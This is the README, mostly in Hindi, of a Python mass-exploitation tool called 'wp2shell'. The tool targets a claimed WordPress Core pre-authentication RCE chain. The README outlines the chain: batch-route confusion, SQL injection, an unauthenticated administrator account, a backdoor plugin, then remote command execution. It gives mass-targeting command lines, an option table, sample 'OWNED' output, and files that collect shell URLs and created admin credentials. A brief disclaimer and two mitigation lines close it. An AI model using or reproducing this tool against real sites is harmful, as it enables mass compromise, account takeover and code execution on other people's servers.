
WordPress Core प्री-ऑथ RCE चेन CVE-2026-63030 और CVE-2026-60137 के लिए Python मास एक्सप्लॉइट और डिटेक्टर, जो SQL इंजेक्शन को रिमोट कोड एक्ज़ीक्यूशन में चेन करता है।
| विशेषता | विवरण |
|---|---|
| CVE ID | CVE-2026-63030 (+ CVE-2026-60137) |
| चेन | wp2shell — प्री-ऑथ RCE |
| गंभीरता | 🔴 गंभीर (CVSS 9.8) |
| लक्ष्य | WordPress Core (सेम प्लगइन्स) |
| प्रभावित (RCE) | 6.9.0 – 6.9.4 और 7.0.0 – 7.0.1 |
| प्रभावित (केवल SQLi) | 6.8.0 – 6.8.5 |
| ठीक किया गया | 6.8.6 / 6.9.5 / 7.0.2 (18/07/2026) |
| आवश्यक प्रमाणीकरण | कोई नहीं |
WordPress कोर में दो श्रृंखलाबद्ध त्रुटियाँ:
WP_Query के पैरामीटर author__not_in में SQL इंजेक्शन।/wp-json/batch/v1 बैच प्रविष्टियों को डिसिंक्रोनाइज़ करता है, जिससे एक अनुरोध अगले रूट पर "गिर" जाता है।यह चेन SQLi को प्री-ऑथेंटिकेशन RCE में परिवर्तित करती है:
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
│ │
└──────────────┬─────────────────────┘
▼
UNION fake-post + oEmbed + changeset poisoning
▼
POST /wp/v2/users (roles: administrator) ← admin criado sem auth
▼
login → upload plugin backdoor → RCE
फ़ॉलबैक: सीधा INTO OUTFILE (FILE विशेषाधिकार) और ब्लाइंड हैश एक्सट्रैक्शन + क्रैक।
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
| विकल्प | विवरण |
|---|---|
-l, --targets-file | प्रति पंक्ति एक लक्ष्य (दोहराने योग्य, असीमित) |
-u, --target | एकल लक्ष्य |
--cmd | लक्ष्य पर निष्पादित करने के लिए कमांड |
--authorized | अनिवार्य (या WP2SHELL_AUTHORIZED=1) |
-c, --concurrency | समानांतर लक्ष्य (1–32) |
--delay | टाइमिंग/एक्सट्रैक्शन का SLEEP (2 = मजबूत) |
--rate | प्रति लक्ष्य अनुरोध/सेकंड |
-k, --insecure | TLS को अनदेखा करें |
--proxy | HTTP प्रॉक्सी |
--wordlist / --password / --username | क्रेडेंशियल फ़ॉलबैक |
--log / --owned / --results-csv | आउटपुट फ़ाइलें |
[+] [14:22:31] https://target.com OWNED ✓1 ~0 ✗10
[~] [14:22:32] https://other.com ADMIN ✓1 ~1 ✗10
---- SUMMARY ----
[+] owned=1 [~] admin=1 [-] fail=10 [.] error=0
owned.txt — RCE वाले लक्ष्य (शेल URL)admins.txt — RCE सिंक के बिना बनाए गए एडमिन (क्रेडेंशियल)exploit_log.txt — प्रति लक्ष्य विवरणresults.csv — सारांश (exit_code: 0=owned, 4=admin, 2=fail, 3=error)whl_page) + सामान्य स्लग├── wp2shell.py # exploit + detector
├── targets.txt # alvos (uma URL por linha)
├── owned.txt # RCE conseguido (auto-criado)
├── admins.txt # admins criados (auto-criado)
└── README.md
╔══════════════════════════════════════════════════════════════════╗
║ LEGAL DISCLAIMER ║
╠══════════════════════════════════════════════════════════════════╣
║ This tool is provided for EDUCATIONAL and AUTHORIZED ║
║ SECURITY TESTING purposes only. ║
║ Only use on systems you own or have explicit permission. ║
║ The author is NOT responsible for any misuse or damage. ║
╚══════════════════════════════════════════════════════════════════╝
/wp-json/batch/v1 और /?rest_route=/batch/v1 पर अनऑथेंटिकेटेड POST को ब्लॉक करेंwp-content/uploads/ और wp-content/plugins/ का ऑडिट करें